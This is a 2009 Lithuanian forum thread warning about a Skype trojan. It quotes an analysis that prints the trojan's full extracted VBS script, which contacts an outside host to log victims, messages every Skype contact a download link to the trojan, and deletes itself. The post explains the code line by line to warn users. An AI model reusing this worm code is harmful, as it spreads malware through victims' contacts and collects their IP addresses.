Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: Neapsigaukit! Dar vienas Skype virusas.

Parašė Giedris_· 2009 Vas. 24 21:02:46
#24
BigMan parašė:
Siuo metu labai populiarus patapo trojanas SkypeUpdate.exe. Is tikruju! Trojanas. Turbut daugelis kazka panasaus ir itarinejot, tuomet tik pamatysim kaip paprastai ten viskas vyksta
Taigi, pirmiausia pabandziau isardyti sita programele su resource editorium - gavau tik kruva iconu Daugiau nieko, kazkaip itarinta pasidare. Pasileidau su debugeriu, ir paziurejau kaip ten kas tada veikia. Ogi tas "Kietas Skype priedas (cool)" issextraktuoja vbs scriptuka mums i My Document'us ir paleidzia. Programa uzsidarius turbut scriptas is ten ir istrinamas, taciau debugerio pagalba neisjunges programos, paziurejau kas gi ten per scriptas. Ir stai jis:

Dim xmlhttp
Set xmlhttp = CreateObject("Microsoft.XMLHTTP")
xmlhttp.Open "GET", "http://hack2.summerhost.info/Rezultatai.php", False
Set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
Set uDlVA = wscript.createobject("wscript.shell")
Set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
SkypeMoodText = "Tai ne Virusas ;)"
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Kietas Skype priedas 8-)"& chr(13) & "http://hack2.l4rge.com/SkypeUpdate.exe"
yADAl.SendCommand(yADAl.Command(0, "SET PROFILE RICH_MOOD_TEXT " + SkypeMoodText))
Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
strScript = Wscript.ScriptFullName
objFSO.DeleteFile(strScript)
xmlhttp.Send



Jei dar liko kas nesusiprates, tai eilute

"xmlhttp.Open "GET", "http://hack2.summerhost.info/Rezultatai.php", False "

atidaro http://hack2.summerhost.info/Rez...

Toliau,

SkypeMoodText = "Tai ne Virusas ;)"

uzdeda mums ant skypo mooda "Tai ne virusas ;)"

Ir

yADAl.SendMessage GAG.handle,"Kietas Skype priedas 8-)"& chr(13) & "http://hack2.l4rge.com/SkypeUpdate.exe"

kiekvienam musu kontaktui nusiuncia po miela zinute su tekstu "Kietas Skype priedas 8-)"

Aisku, turbut daug kam krito i akis tas

"xmlhttp.Open "GET", "http://hack2.summerhost.info/Rezultatai.php", False "

Man zinoma irgi Taigi nueikim i http://hack2.summerhost.info/Rez... gaunam toki nekaltai balta puslapeli. O kurejai sito viso aparato visgi ne tokie protingi, kaip GALBUT kam nors pasirode, adreso gale Rezultatai.php pekeite Rezultatai.txt viskas ir atsiskleidzia Gauname milijona IP'u. As net neabejoju, kad jus supratot kad juos kazkas panados per koki ProRat ar ka nors panasaus

Taigi, sekmes! )
Nice copy pasta :D